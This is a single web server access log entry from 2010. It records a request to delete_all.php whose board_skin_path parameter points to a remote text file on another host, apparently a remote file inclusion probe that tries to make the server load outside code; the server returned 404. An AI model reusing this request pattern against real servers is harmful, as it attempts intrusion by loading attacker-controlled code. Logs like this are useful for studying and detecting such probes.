200.93.147.154 - - [03/Mar/2010:14:02:49 -0800] "GET /logs/access_100218.log%20%20//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
